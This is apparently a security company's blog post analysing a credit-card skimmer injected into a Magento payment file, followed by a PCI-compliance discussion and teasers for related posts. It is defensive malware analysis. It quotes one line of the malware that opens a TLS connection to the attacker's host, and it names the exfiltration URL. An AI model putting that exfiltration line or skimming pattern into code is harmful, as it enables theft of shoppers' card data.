Magento PCI Compliance Issues and Theft Over TLS

02052016_MagentoPCICompliance

With about 30% of the market share, Magento is gradually becoming a “WordPress” of the ecommerce world. Like WordPress, it becomes a major target for hackers due to its popularity. However, in the case of Magento, the main goal that hackers pursue is to steal money, either from shop customers or the shop owners.

During the last year we described quite a few Magento attacks that steal customer credit cards. While most of them target the app/code/core/Mage/Payment/Model/Method/Cc.php it’s not the only file that you should be watching.

Magimo Injection

For example, the following malware was injected into the importData function in the includes/src/Mage_Sales_Model_Quote_Payment.php file

 Malicious Magimo injection

Malicious Magimo injection

The four lines with encrypted code that begin with $Magimo really stick out when you look through the file. And while Magimo may look like something inherent to Magento where many modules and variables have names that begin with “Mag”, we are not aware of any Magento software using it. There is a premium WordPress theme called Magimo, but it isn’t involved.

Here’s the decoded version:

 Decoded Magimo malware

Decoded Magimo malware

 

It checks if the function data contains credit card number and sends it to masterprotect[.]ir/1/56.php

Secure Theft

As you might noticed, SSL is important not only to online store owners and customers, but also to the thieves who use the TLS protocol to transfer stolen credit card details to their own server. You can see the attackers using the TLS protocol in the screenshot above:

fsockopen('tls://masterprotect.ir', 443, $r1, $r2, 3);

The Illusion of PCI Compliance in Magento

There is a common misunderstanding among owners of Magento sites. Some think that Magento is PCI compliant if they use SSL for their order forms. This is not true. Actually, the vast majority of Magento sites that process payments themselves are not PCI compliant. This means they are susceptible to attacks that steal customer credit card details. On the other hand, Magento provides methods that allow website owners to achieve PCI compliance:

Magento makes PCI compliance easier by offering integrated payment gateways that allow merchants to securely transmit credit card data via direct post API methods or with hosted payment forms provided by the payment gateway integrated with the merchant’s checkout pages. The Direct Post method allows for information to be sent directly to the payment gateway without sensitive data flowing through or stored on the Magento application server.

Conclusion

If you want to be PCI compliant but don’t have a dedicated professional security staff working with your site on a daily basis, you have to avoid processing payments on your server.

If you have questions about what PCI compliance is, and how you can achieve it for your ecommerce site, read our Introduction to E-Commerce and PCI Compliance

Server Security: Import WordPress Events to OSSEC

01282015_Ossec_WordPressUpdate

We leverage OSSEC extensively to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source Intrusion Detection System (HIDS); it has a powerful correlation and analysis engine that integrates log analysis, file
Read More

Massive Admedia/Adverting iFrame Infection

02012016_Admedia

This past weekend we registered a spike in WordPress infections where hackers injected encrypted code at the end of all legitimate .js files. The distinguishing features of this malware are:
Read More

The Risks of Hiring a Bad SEO Company

Blackhat SEO Website Malware

Today we are not going to explore malware or any other overtly malicious traffic. Instead this post is a warning about dishonest marketing tactics used by services claiming to improve your website traffic or Search Engine Optimization (SEO). We
Read More

Security Advisory: Stored XSS in Magento

Magento-Logo

Security Risk: Dangerous Exploitation Level: Easy/Remote DREAD Score: 7/10 Vulnerability: Stored XSS Patched Version:  Magento CE: 1.9,2.3, Magento EE: 1.14.2.3 During our regular research audits for our Cloud-based WAF, we discovered a Stored
Read More

Server Security: OSSEC Integrates Slack and PagerDuty

Screen Shot 2016-01-15 at 2.17.48 AM

We leverage OSSEC extensively to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source Intrusion Detection System (HIDS); it has a powerful correlation and analysis engine that integrates log analysis, file
Read More

Ransomware Strikes Websites

Website Ransomware

Ransomware is one of the most insidious types of malware that one can come across. These infections will encrypt all files on the target computer as well as any hard drives connected to the machine – pictures, videos, text files – you name it. This me
Read More

Malicious Pastebin Replacement for jQuery

jQuery Pastebin

Website hackers are always changing tactics and borrowing ideas from each other. One of the challenges of website security is staying on top of those threats as they evolve. We wrote in the past about fake jQuery scripts and how hackers use
Read More

Fake Media Download Sites

12222015_FakeDownloadSites_v2

Your website is a huge part of your brand reputation. It serves as a place to build your audience and helps you get noticed by new visitors from search engines. You spend time working hard to build authority and trustworthiness. When your pages rank
Read More

Using WPScan: Finding WordPress Vulnerabilities

Usingwpscan_blog

When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if any weak passwords, users, and security configuration issues are present. The database at
Read More